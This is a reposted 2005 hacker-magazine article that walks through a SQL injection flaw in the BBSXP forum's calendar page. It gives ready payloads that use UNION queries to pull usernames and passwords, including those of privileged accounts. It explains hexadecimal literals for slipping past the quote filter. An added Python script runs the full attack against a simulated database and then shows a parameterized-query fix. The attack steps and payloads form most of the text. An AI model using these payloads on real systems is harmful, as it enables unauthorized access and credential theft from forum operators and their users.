SoFunction
Updated on 2025-04-13

Re-exploration of BBSXP vulnerability

Note: This article was published in issue 6 (2005) of "Hacker X Archives", which holds the copyright. Please keep the article intact and credit the source when reprinting.

The BBSXP forum has not been quiet lately: vulnerabilities keep surfacing one after another. Not long after the last vulnerability in this file was analyzed, another one appeared, so even a rookie like me cannot sit still. Rather than wait for someone else to find the holes every time, let's analyze it ourselves.
First, recall the previous vulnerability: the order variable was only passed through HTMLEncode before being used in a SQL statement. Now look at the vulnerable code this time (the id value is concatenated into the statement unquoted, as the reconstructed statement below shows):
id=HTMLEncode(Request("id"))
if id<>"" then
sql="select * from [calendar] where id="&id&" order by id Desc"
The id variable, too, is only passed through HTMLEncode before being spliced into the SQL statement; nothing checks that it is actually a number. The attack is therefore to craft a special id value and use a UNION query to pull the password out.
Tips: Basic introduction to UNION query
UNION merges the result sets of two SELECTs and automatically drops duplicate rows (UNION ALL would keep them). Every SELECT taking part in the UNION must return the same number of columns, and the corresponding columns should have the same data types:
select top 1 username,userpass from [user] union select 'test','12345' from [clubconfig]
The single quotes mark the constants as character data so that they match the types of username and userpass (Access is not strict about this: mismatched types do not cause a SQL error). Executed through the database-operation module of Ocean 2006, the result is shown in Figure 1.

[Figure 1]
Principle and analysis
Once UNION queries are understood, we can construct the id. For example: id=-1 union select 1,2,3,4,5,6,7 from [user] where membercode=5
Restoring the complete SQL statement gives:
select * from [calendar] where id=-1 union select 1,2,3,4,5,6,7 from [user] where membercode=5 order by id Desc
The first half of the statement returns nothing, because no row has id=-1. The seven numbers 1 to 7 are there because the calendar table has seven fields and, as noted above, both sides of a UNION must have the same column count: with the wrong count the page errors out, so one simply adds numbers until it stops erroring. The result is shown in Figure 2.

[Figure 2]
The positions whose numbers actually appear on the page (here 3 and 4) can be replaced with the field names username and userpass. Because of the membercode=5 condition, this returns the username and password of a community "district mayor" level account (Figure 3). It is just as easy to look up a specific user's password by restricting on username instead. Note, however, that HTMLEncode filters single quotes, so the username cannot be written as a quoted string and must be supplied as a hexadecimal literal. The statement becomes:
id=-1 union select 1,2,userpass,4,5,6,7 from [user] where username=0xD3C3BBA7
Here 0xD3C3BBA7 is the hexadecimal form of the username 用户 (Chinese for "user"), that is, its GBK bytes. For digits and English letters, remember that each character has to be written as two bytes (four hex digits) with a trailing 00, so "1" is written as 0x3100. The column's type decides which encoding matches: a varchar column compares the raw code-page bytes, while an nvarchar column expects UTF-16LE with two bytes per character, so if one form returns nothing, try the other. The 0x literal syntax is SQL Server's, which is also the edition the DECLARE @cmd sysname trick from last time targeted. Otherwise this is the same technique as last time; the one difference is that last time we used DECLARE @cmd sysname and converted spaces to "+" signs, and further testing showed that to be unnecessary, which is why I mention it specifically.
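As an added, self-contained example (not code from the article or from BBSXP), the following Python script models the vulnerable concatenation shown in the listing above and walks through the whole procedure: the column-count probing that the UNION tip relies on, the credential leak via membercode=5, the hexadecimal literals used for the quote-free username lookup, and the parameterized query that closes the hole. It runs against an in-memory SQLite stand-in for the forum's calendar and user tables; the HTMLEncode model, the table layouts and the sample rows are assumptions, and SQLite does not execute the 0x literals (SQL Server syntax), so those are only constructed and checked as strings.

```python
import sqlite3

# Model of the forum's HTMLEncode. The article says it filters single quotes,
# so this behaves like classic ASP Server.HTMLEncode plus the apostrophe
# (assumed; the real function is not on the page).
HTML_ENCODE_MAP = {"&": "&amp;", "<": "&lt;", ">": "&gt;",
                   '"': "&quot;", "'": "&#39;"}


def html_encode(value):
    """Entity-escape markup characters only; digits, commas, brackets pass through."""
    return "".join(HTML_ENCODE_MAP.get(ch, ch) for ch in value)


def build_calendar_sql(id_param):
    """The vulnerable statement: id is HTMLEncoded, then pasted unquoted
    between WHERE and ORDER BY, exactly as in the forum's listing."""
    return ("select * from [calendar] where id=" + html_encode(id_param)
            + " order by id Desc")


def open_demo_db():
    """Constructed sample schema standing in for the forum's tables:
    a 7-column calendar table and a user table with a membercode column."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table [calendar](id integer, title text, body text, day text,
                                month text, year text, author text);
        insert into [calendar] values(10,'Meeting','Room 2','13','04','2005','mod');
        create table [user](username text, userpass text, membercode integer);
        insert into [user] values('admin','s3cret',5);
        insert into [user] values('guest','guest',1);
    """)
    return db


def count_columns_by_union(db, max_cols=10):
    """Probe the column count: UNION SELECT 1..n errors until n matches."""
    for n in range(1, max_cols + 1):
        numbers = ",".join(str(i) for i in range(1, n + 1))
        payload = "-1 union select " + numbers + " from [user]"
        try:
            db.execute(build_calendar_sql(payload)).fetchall()
            return n            # no error: this is the calendar column count
        except sqlite3.OperationalError:
            continue            # column count mismatch, try one more
    return None


def leak_credentials(db, membercode=5):
    """Replace the displayed positions (3 and 4) with username/userpass and
    restrict to the privileged membercode, as the article does."""
    payload = ("-1 union select 1,2,username,userpass,5,6,7 from [user] "
               "where membercode=%d" % membercode)
    rows = db.execute(build_calendar_sql(payload)).fetchall()
    return [(row[2], row[3]) for row in rows]


def hex_literal(text, encoding):
    """Write a string as a quote-free 0x... literal. 'gbk' reproduces the
    article's 0xD3C3BBA7 for 用户; 'utf-16-le' gives 0x3100 for '1'."""
    return "0x" + text.encode(encoding).hex().upper()


def safe_lookup(db, id_param):
    """Hardened form: the id is bound as a parameter, never concatenated,
    so the UNION payload is just a string that matches no integer id."""
    return db.execute("select * from [calendar] where id=? order by id desc",
                      (id_param,)).fetchall()


if __name__ == "__main__":
    db = open_demo_db()
    print("calendar columns:", count_columns_by_union(db))
    print("leaked:", leak_credentials(db))
    print("username 用户 as GBK literal:", hex_literal("用户", "gbk"))
    print("'1' as UTF-16LE literal:", hex_literal("1", "utf-16-le"))
    payload = "-1 union select 1,2,username,userpass,5,6,7 from [user] where membercode=5"
    print("parameterized query with payload:", safe_lookup(db, payload))
```

Running the script shows the probe stopping at 7, the admin credentials coming back in positions 3 and 4, and the same payload returning nothing once the id is bound as a parameter; html_encode leaves the numeric payload untouched because it contains no markup characters, which is exactly why HTMLEncode is no defence here.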